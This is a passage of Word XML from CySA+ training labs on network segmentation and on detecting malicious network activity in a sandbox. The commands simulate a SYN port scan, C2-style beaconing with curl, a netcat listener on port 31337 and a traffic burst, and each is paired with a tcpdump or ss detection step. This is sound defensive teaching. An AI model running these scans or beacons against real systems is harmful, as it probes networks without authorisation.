              </w:rPr>
              <w:t>Network segmentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Two namespaces with separate stacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Zero Trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Deny-by-default + per-flow allow rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SASE / SDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The policy is software-defined, not wired</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Microsegmentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Per-port allow at the workload edge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Clean up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns del zone-a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns del zone-b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to build two isolated network zones with ip netns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How iptables enforces a segmentation boundary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How a deny-by-default + per-flow allow list maps to Zero Trust.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The CySA+ vocabulary (segmentation, SASE, SDN, ZTNA) in concrete commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Browser-Based Tools (Tertiary Infotech)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These free browser tools complement this lab — no install required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IP Subnet Calculator (https://alfredang.github.io/ipcalculator/) — a browser IP/subnet calculator for network and CIDR planning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Use the IP Subnet Calculator to plan the CIDR ranges for each isolated network zone before you create the namespaces, and to verify that the two zones do not overlap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to how to build two isolated network zones with ip netns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 4 — Detecting Malicious Network Activity</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generate and detect several network-based indicators of compromise: port scans, beaconing, unusual traffic spikes, and activity on unexpected ports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will generate and detect several network-based indicators of compromise: port scans, beaconing, unusual traffic spikes, and activity on unexpected ports. These are exam-blueprint items under CySA+ 1.2 (Network-related indicators of malicious activity).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run all commands on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y tcpdump nmap netcat-openbsd curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Detect a port scan (scans/sweeps)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In terminal 1, start a capture:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tcpdump -i any -nn 'tcp[tcpflags] &amp; (tcp-syn) != 0 and not tcp[tcpflags] &amp; tcp-ack != 0' -c 30 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This BPF filter shows only SYN packets without ACK — the signature of a TCP connect or SYN scan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In the same terminal, run an Nmap scan against localhost:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nmap -sS -p 1-1000 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You will see dozens of SYN attempts in the capture — the smoking gun of a scan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Detect beaconing (regular C2 callbacks)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Beaconing is malware checking in with its command-and-control server on a regular cadence. Simulate it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for i in {1..6}; do curl -s -o /dev/null http://example.com; sleep 5; done &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Capture every connection to port 80 and time-stamp it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tcpdump -i any -nn -ttt 'tcp port 80 and tcp[tcpflags] &amp; tcp-syn != 0' -c 6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-ttt prints the delta between packets. A perfectly periodic interval (every 5.000 s here) is the classic beaconing pattern. Real C2 jitters the interval, but the average is still detectable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Detect activity on an unexpected port</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Spawn a listener on an unusual port:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nc -l -p 31337 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nc -zv 127.0.0.1 31337</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Find it from a baseline-deviation viewpoint:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ss -tulnp | grep -vE ':(22|53|80|443|123)\s'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Anything not on a sanctioned port is a candidate for investigation. Port 31337 is a well-known "elite" attacker port and the canonical example of "activity on unexpected ports".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Detect a traffic spike (bandwidth consumption)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Generate a burst of traffic:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for i in {1..100}; do curl -s -o /dev/null http://example.com &amp; done; wait</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Measure per-interface bytes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat /proc/net/dev | column -t</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In production a NetFlow collector or iftop/nethogs reveals top talkers; a sudden 10× jump on one host is a data-exfiltration red flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Detect irregular peer-to-peer / rogue device patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ARP sweeps reveal rogue devices and lateral-movement reconnaissance:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip neigh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>arp -n 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Repeated ARP queries for the entire /24 from one source is a host enumeration attempt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Clean up background jobs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>kill %1 %2 2&gt;/dev/null; jobs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>BPF filters for SYN-only packets → detecting scans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Using tcpdump -ttt to spot beaconing intervals.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Identifying activity on unexpected ports with ss.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Recognising bandwidth spikes and ARP-based rogue device indicators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Browser-Based Tools (Tertiary Infotech)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These free browser tools complement this lab — no install required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PCAP Analyzer (https://alfredang.github.io/pcapanalyzer/) — a browser tool that parses .pcap/.pcapng files and shows protocols, top talkers and packet detail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Save the traffic you capture with tcpdump to a .pcap file, then open it in the PCAP Analyzer to review the protocol breakdown and top talkers in your browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cybersecurity Simulator (https://alfredang.github.io/cybersecuritysimulator/) — an interactive browser simulator for practising security-analyst decisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Use the Cybersecurity Simulator to rehearse the analyst decisions (block, monitor, escalate) that follow from the malicious-activity indicators you find.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to bPF filters for SYN-only packets → detecting scans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
